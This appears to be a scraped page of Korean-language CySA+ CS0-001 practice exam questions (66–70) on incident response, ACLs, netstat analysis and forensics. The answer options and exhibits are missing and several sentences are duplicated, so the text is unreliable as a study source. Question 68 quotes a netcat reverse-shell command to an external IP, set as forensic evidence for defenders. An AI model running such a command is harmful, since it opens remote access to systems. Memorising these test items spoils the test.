CS0-001 문제 66
사이버보안 분석가는 다음 패킷을 검토한 결과, 회사 컴퓨터에서 승인되지 않은 서비스가 실행되고 있는 것을 발견했습니다.
다음 ACL 중 어떤 것을 구현하면, 허가되지 않은 서비스에 대한 추가 접근만 차단하고 다른 서비스에는 영향을 미치지 않습니까?
다음 ACL 중 어떤 것을 구현하면, 허가되지 않은 서비스에 대한 추가 접근만 차단하고 다른 서비스에는 영향을 미치지 않습니까?
CS0-001 문제 67
분석가는 명령줄 도구를 사용하여 호스트에서 열려 있는 포트와 실행 중인 서비스를 식별하고, 해당 서비스와 포트에 연결된 애플리케이션을 식별하려고 합니다. 분석가는 다음 중 어떤 것을 사용해야 합니까?
CS0-001 문제 68
보안 분석가는 회사의 공개 포털을 위한 프로덕션 서버의 잠재적인 침해를 조사하고 있습니다. 분석가는 서버에 대한 취약성 검사를 실행하고 다음과 같은 출력을 받습니다.
일부 포털의 시작 명령 파일에서 다음 명령이 나타납니다.
nc -o /bin/sh 72.14.1.36 4444
추가 조사를 통해 분석가는 Netstat를 실행하고 다음과 같은 출력을 얻습니다.
다음 중 분석가가 취해야 할 가장 좋은 단계는 무엇일까요?
일부 포털의 시작 명령 파일에서 다음 명령이 나타납니다.
nc -o /bin/sh 72.14.1.36 4444
추가 조사를 통해 분석가는 Netstat를 실행하고 다음과 같은 출력을 얻습니다.
다음 중 분석가가 취해야 할 가장 좋은 단계는 무엇일까요?
CS0-001 문제 69
새롭게 발견된 맬웨어는 포트에서 외부 대상지로 아웃바운드 연결하는 알려진 동작을 가지고 있습니다.
데이터를 빼내기 위한 목적으로 27500개. 다음은 별도의 Windows 워크스테이션에서 netstat -an을 실행하여 가져온 네 개의 스니펫입니다.
위 정보를 기준으로 볼 때, 다음 중 이 맬웨어에 노출될 가능성이 가장 높은 것은 무엇입니까?
데이터를 빼내기 위한 목적으로 27500개. 다음은 별도의 Windows 워크스테이션에서 netstat -an을 실행하여 가져온 네 개의 스니펫입니다.
위 정보를 기준으로 볼 때, 다음 중 이 맬웨어에 노출될 가능성이 가장 높은 것은 무엇입니까?
CS0-001 문제 70
보안 운영팀이 모의 포렌식 조사를 진행하고 있습니다. 침해된 워크스테이션을 압수한 후 취해야 할 첫 번째 조치는 다음 중 어느 것입니까?